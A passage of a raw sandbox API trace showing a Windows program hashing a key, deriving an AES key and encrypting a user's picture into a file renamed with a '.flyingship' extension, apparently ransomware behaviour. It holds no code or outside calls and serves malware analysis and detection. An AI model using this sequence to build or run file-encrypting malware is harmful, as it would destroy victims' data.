wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0191.597] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.597] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2798 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.597] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.597] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0191.597] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.597] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0191.597] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90af98 [0191.597] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2798 [0191.597] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.598] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.598] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.598] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.598] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0191.598] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2718 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.598] CryptCreateHash (in: hProv=0x9c0c00, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x87e808 | out: phHash=0x87e808) returned 1 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27d8 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd750 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0191.598] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0191.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.599] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27d8 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4c0 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26c8 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.599] CharLowerBuffW (in: lpsz="byte[25]", cchLength=0x8 | out: lpsz="byte[25]") returned 0x8 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2768 [0191.599] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26c8 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.600] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d4c0 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc198 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0191.600] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.600] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.600] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2668 [0191.600] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.600] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2668 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.601] CryptHashData (hHash=0x90af58, pbData=0x8df000, dwDataLen=0x19, dwFlags=0x1) returned 1 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28c8 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d460 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27c8 [0191.601] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e83b8 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2688 [0191.601] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.601] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28c8 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2688 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0191.601] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf380 [0191.601] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.602] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0191.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2768 [0191.602] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0191.602] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0191.602] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27a8 [0191.602] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.602] CryptDeriveKey (in: hProv=0x9c0c00, Algid=0x660e, hBaseData=0x90af58, dwFlags=0x1, phKey=0x87e808 | out: phKey=0x87e808*=0x90aed8) returned 1 [0191.602] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.602] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.602] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.602] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.602] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.603] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.603] PeekMessageW (in: lpMsg=0x87e944, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e944) returned 0 [0191.603] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.603] CryptDestroyHash (hHash=0x90af58) returned 1 [0191.603] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.603] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.603] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.603] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.603] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.603] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdzhtnrtuaafiidk.bmp"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x160 [0191.604] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0191.604] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef40 | out: lpNewFilePointer=0x0) returned 1 [0191.604] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.605] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.605] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.605] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\qdzhTNRtUaAFIidK.flyingship.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\qdzhtnrtuaafiidk.flyingship.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0191.609] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.609] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.609] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.609] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.609] SetFilePointerEx (in: hFile=0x160, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87ef90 | out: lpNewFilePointer=0x0) returned 1 [0191.609] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0xc3db, lpOverlapped=0x0) returned 1 [0191.612] ReadFile (in: hFile=0x160, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87efb8, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87efb8*=0x0, lpOverlapped=0x0) returned 1 [0191.612] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.612] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.612] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0191.612] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0191.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.613] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0191.613] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.613] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0191.613] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.613] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.613] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0191.613] PeekMessageW (in: lpMsg=0x87e2d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e2d4) returned 0 [0191.613] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0191.613] CryptGetKeyParam (in: hKey=0x90aed8, dwParam=0x7, pbData=0x9c27a8, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c27a8*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0191.613] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.613] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0191.613] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.614] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0191.614] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0191.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def60 | out: hHeap=0x8a0000) returned 1 [0191.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.614] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0191.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0191.614] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0191.614] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90b018 | out: hHeap=0x8a0000) returned 1 [0191.614] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0191.614] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0191.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf380 | out: hHeap=0x8a0000) returned 1 [0191.614] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0191.615] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.615] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0191.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db408 | out: hHeap=0x8a0000) returned 1 [0191.615] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0191.615] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, 